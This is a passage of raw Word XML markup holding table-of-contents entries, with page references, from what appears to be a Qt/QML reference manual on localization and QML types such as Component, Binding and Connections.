            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>1. Use qsTr() for all Literal User Interface Strings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605338 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>146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39" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>2. Add Context for the Translator</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605339 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>147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40" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>3. Disambiguate Identical Texts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605340 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>147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41" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>4. Use </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
            <w:noProof/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>%x</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t> to Insert Parameters into a String</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605341 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>148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42" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>5. Use %Lx so Numbers are Localized</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605342 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>148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43" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>6. Internationalize Dates, Times and Currencies</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605343 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>148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44" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>7. Use QT_TR_NOOP() for Translatable Data Text Strings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605344 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>149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45" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>8. Use Locale to Extend Localization Features</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605345 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>149</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46" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Localizing Your Application</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605346 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>150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47" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use a Conditional to Hide QML Source From the Compiler</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605347 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>150</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605348" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>All QML Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605348 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>151</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49" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>New Classes and Functions in Qt 5.8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605349 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>155</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50" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Component QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605350 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>155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51" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Detailed Description</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605351 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>155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52" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creation Context</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605352 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>156</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53" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtObject QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605353 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>157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54" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Detailed Description</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605354 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>157</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55" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Binding QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605355 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>157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56" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Detailed Description</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605356 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>157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57" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Binding to an inaccessible property</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605357 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>158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58" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Conditional bindings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605358 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>158</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59" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Connections QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605359 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>159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60" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Detailed Description</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605360 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>159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61" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Instantiator QML Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605361 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>160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62" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Detailed Description</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605362 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
